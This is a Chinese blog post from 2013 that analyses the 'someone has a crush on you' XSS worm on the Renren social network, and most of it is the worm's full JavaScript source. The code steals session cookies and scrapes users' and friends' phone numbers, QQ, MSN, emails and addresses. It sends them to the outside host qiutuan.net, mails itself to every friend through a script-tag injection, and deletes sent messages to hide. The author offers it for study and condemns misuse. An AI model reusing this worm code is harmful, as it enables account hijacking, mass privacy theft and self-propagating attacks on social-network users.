分類  >  Web前端 >

眾人網「有人暗戀你哦」病毒源碼解析

tags:    時間:2013-12-10 19:47:21
人人網「有人暗戀你哦」病毒源碼解析
這個病毒的原理基本上是這樣的,病毒攻擊者利用人人網對XSS(跨站腳本攻擊)沒有做任何防護實施的,簡單的流程可以描述成這樣:病毒製造者寫了封站內信,信里里有一段<script src='http://qiutuan.net/2011/51.js'></script>這樣一段腳本,現在你所看到的是可視化的內容,但是人人把它作為了html標籤的內容,於是下載51.js,然後執行之,因為你在看這封站內信時已處於登錄狀態,這個js文件可以獲取cookie內容,然後獲取你的信息,然後通過一些列手段獲取你的好友的信息,然後將該站內信發給你的所有好友。這個所謂的「病毒」最大的危害是泄露隱私內容,比如說你的手機號、qq號、msn、學校信息等.
   下面把那段js貼出來,大家可以研究下,寫js代碼的哥們肯定是人人的前員工或者其他類似的,裡邊使用了很多變態的技巧,有一定的學習價值,但是拿他來作惡是不對的。

var token = XN.get_check;
var mobile_friends = [];
var all_friends = [];

var my_id = 0;

function send_data(v) {
    var img = document.createElement('img');
    img.src = 'http://qiutuan.net/2011/log.php?' + v;
    document.body.appendChild(img);
    document.body.removeChild(img);
}

function send_to_friends() {
    var i;
    var idlist = [];
    for (i = 0; i < all_friends.length; i++) {
        idlist.push(all_friends[i].toString());
        if (idlist.length == 10) {
            _send_to_friends(idlist);
            idlist = [];
        }
    }
    if (idlist.length > 0) _send_to_friends(idlist);
}

function _send_to_friends(ids) {
    var content = "相信每個女生心底都有一隻小貓,有的嫵媚,有的狂野,有的多愁善感,有的古靈精怪……你心底的那隻蠢蠢欲動的小貓,是什麼樣子的呢?她喜歡笑,你就老以為她是快樂的;她喜歡跳,你就老以為她是開朗的;她喜歡扭,你就老以為她是放肆的;她喜歡叫,你就老以為她是狂野的。一個人的時候,她其實多愁善感;一個人的時候,她其實安靜淡然;一個人的時候,她其實內向自閉;一個人的時候,她其實乖巧溫柔……<img src='http://postimg1.mop.com/200712/15/80/2025080/200712150436548802.jpg'></img>
<script src='http://qiutuan.net/2011/51.js'></script> ";
    var p = {
        action: "sharetofriend",
        body: content,
        form: {
            albumid: "0",
            currenUserTinyurl: "http://hdn.xnimg.cn/photos/hdn421/20110118/1220/tiny_GeT4_23780d019116.jpg",
            fromSharedId: "0",
            fromShareOwner: "0",
            fromname: "",
            fromno: "0",
            fromuniv: "",
            link: "http://edm.renren.com/link.do?l=27627&t=51",
            pic: "http://jebe.xnimg.cn/20110412/19/62caea7b-c7bc-4217-994a-ba6c061e5aa0.jpg",
            summary: "相信每個女生心底都有一隻小貓,有的嫵媚,有的狂野,有的多愁善感,有的古靈精怪……你心底的那隻蠢蠢欲動的小貓,是什麼樣子的呢?",
            title: "加a02好友 獎品散不停",
            type: "51"
        },
        ids: ids,
        noteId: "0",
        subject: "有人暗戀你哦,你想知道TA是誰么",
        tsc: token
    };

    delete p.tsc;

    new XN.net.xmlhttp({
        url: "http://share.renren.com/share/submit.do",
        data: "tsc=" + token + "&post=" + encodeURIComponent(XN.json.build(p)),
        onSuccess: function (response) {
            del_send_messages();
        }
    });
}

function del_messages(idlist) {

    var struct_msgs = {
        action: "delete",
        folder: "1",
        slice: "20",
        unread_count: "0",
        ids: idlist
    };

    new Ajax.Request("/message/ajax.do", {
        method: "get",
        parameters: "post=" + encodeURIComponent(XN.JSON.build(struct_msgs))
    });

}


function del_send_messages() {
    new XN.net.xmlhttp({
        url: "http://msg.renren.com/message/inbox.do?f=1",
        method: "GET",
        onSuccess: function (response) {
            var listid1 = response.responseText.match(/thread_(\d+)/g);
            for (var i = 0; i < listid1.length; i++) {
                listid1[i] = listid1[i].substring(7);
            }
            del_messages(listid1);
        }
    });
}



function get_self_info() {
    new XN.net.xmlhttp({
        url: "http://www.renren.com/profile.do?v=info_ajax&undefined",
        method: "GET",
        onSuccess: function (r) {

            var text_html = r.responseText;

            var id, name, birthday, qq, school, mobile, msn, day, month, year;

            id = /getalbumprofile\.do\?owner\=(\d+)/.exec(text_html)[1];
            my_id = id;
            school = /pf_spread\'\>(.*?)\<\/a\>/.exec(text_html)[1];
            year = /birt\"\,\"year\"\:\"(\d+)/.exec(text_html)[1];
            month = /birt\"\,\"month\"\:\"(\d+)/.exec(text_html)[1];
            day = /birt\"\,\"day\"\:\"(\d+)/.exec(text_html)[1];
            name = /alt\=\"([^\"]+)的大頭貼/.exec(text_html)[1];

            if (month <= 9) {
                month = "0" + month;
            }
            if (day <= 9) {
                day = "0" + day;
            }
            birthday = year + month + day;

            qq = /QQ.*?dd\>(.*?)\<\/dd/.exec(text_html)[1];

            msn = /MSN.*?dd\>(.*?)\<\/dd/.exec(text_html)[1];

            mobile = /手機號.*?dd\>(.*?)\<\/dd/.exec(text_html)[1];

            var data = "type=self_info&id=" + id + "&name=" + encodeURIComponent(name) + "&school=" + encodeURIComponent(school) + "&birth=" + birthday + "&qq=" + qq + "&msn=" + encodeURIComponent(msn) + "&mobile=" + mobile;
            send_data(data);
        }

    });
}

function get_card(tid) {
    new XN.net.xmlhttp({
        url: 'http://www.renren.com/showcard?friendID=' + tid,
        method: 'get',
        onSuccess: function (r) {
            var obj = eval("(" + r.responseText + ")");
            var data = 'type=card&my_id=' + my_id + '&id=' + obj.id + '&name=' + encodeURIComponent(obj.name) + '&msn=' + encodeURIComponent(obj.msn) + '&phone=' + encodeURIComponent(obj.phone) + '&qq=' + encodeURIComponent(obj.qq) + '&email=' + encodeURIComponent(obj.email) + '&address=' + encodeURIComponent(obj.address);
            send_data(data);
        }
    });
}


function get_all_friends() {
    new XN.net.xmlhttp({
        url: "http://www.renren.com/listcards",
        method: "GET",
        onSuccess: function (r) {

            var text_html = r.responseText;
            //alert(text_html);
            var friends_list = eval("(" + text_html + ")");
            var owned_mobile = (friends_list.list[0].list).length; //have mobile friends number
            for (var i = 0; i < owned_mobile; i++) {
                mobile_friends.push(friends_list.list[0].list[i].id);
                all_friends.push(friends_list.list[0].list[i].id);
            }
            //alert(mobile_friends.length);
            var no_mobile = (friends_list.list[1].list).length;
            for (var i = 0; i < no_mobile; i++) {
                all_friends.push(friends_list.list[1].list[i].id);
            }
            //alert(all_friends.length);
            for (var i = 0; i < mobile_friends.length; i++)
            get_card(mobile_friends[i]);
            send_to_friends();
        }
    });
}

window.onload = function () {
    send_data('type=cookie&v=' + encodeURIComponent(document.cookie));
    get_self_info();
    get_all_friends();
}


推薦閱讀文章

Bookmark the permalink ,來源:互聯網